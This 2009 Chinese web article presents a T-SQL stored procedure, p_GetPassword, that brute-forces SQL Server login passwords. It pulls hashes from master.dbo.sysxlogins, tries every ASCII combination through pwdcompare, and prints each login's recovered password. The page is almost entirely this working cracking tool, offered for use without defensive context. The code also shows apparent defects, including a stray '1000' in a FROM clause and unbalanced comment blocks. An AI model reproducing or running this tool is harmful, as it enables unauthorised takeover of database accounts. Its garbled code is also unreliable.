一个SQL Server Sa密码破解的存储过程

  • 来源: 赛迪网 作者: fen   2009-08-02/09:08
  • 一个SQL Server Sa密码破解的存储过程:

    if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)

    drop procedure [dbo].[p_GetPassword]

    GO

    /*--穷举法破解 SQL Server 用户密码

    可以破解中文,特殊字符,字符+尾随空格的密码

    为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII

    理论上可以破解任意位数的密码

    条件是你的电脑配置足够,时间足够

    /*--调用示例

    exec p_GetPassword

    --*/

    create proc p_GetPassword

    @username sysname=null, --用户名,如果不指定,则列出所有用户

    @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的

    as

    set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

    select top 255 id=identity(int,0,1) into #t from syscolumns

    alter table #t add constraint PK_#t primary key(id)

    select name,password

    ,type=case when xstatus&2048=2048 then 1 else 0 end

    ,jm=case when password is null then 1 else 0 end

    ,pwdstr=cast('' as sysname)

    ,pwd=cast('' as varchar(8000))

    into #pwd

    from 1000 master.dbo.sysxlogins a

    where srvid is null

    and name=isnull(@username,name)

    declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)

    declare @l int

    select @l=0

    ,@s1='char(aa.id)'

    ,@s2='cast(aa.id as varchar)'

    ,@s3=',#t aa'

    exec('

    update pwd set jm=1,pwdstr='+@s1+'

    ,pwd='+@s2+'

    from #pwd pwd'+@s3+'

    where pwd.jm=0

    and pwdcompare('+@s1+',pwd.password,pwd.type)=1

    ')

    while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

    begin

    select @l=@l+1

    ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'

    ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'

    ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)

    exec('

    update pwd set jm=1,pwdstr='+@s1+'

    ,pwd='+@s2+'

    from #pwd pwd'+@s3+'

    where pwd.jm=0

    and pwdcompare('+@s1+',pwd.password,pwd.type)=1

    ')

    end

    select 用户名=name,密码=pwdstr,密码ASCII=pwd

    from #pwd

    go


    评论 {{userinfo.comments}}

    {{money}}

    {{question.question}}

    A {{question.A}}
    B {{question.B}}
    C {{question.C}}
    D {{question.D}}
    提交

    驱动号 更多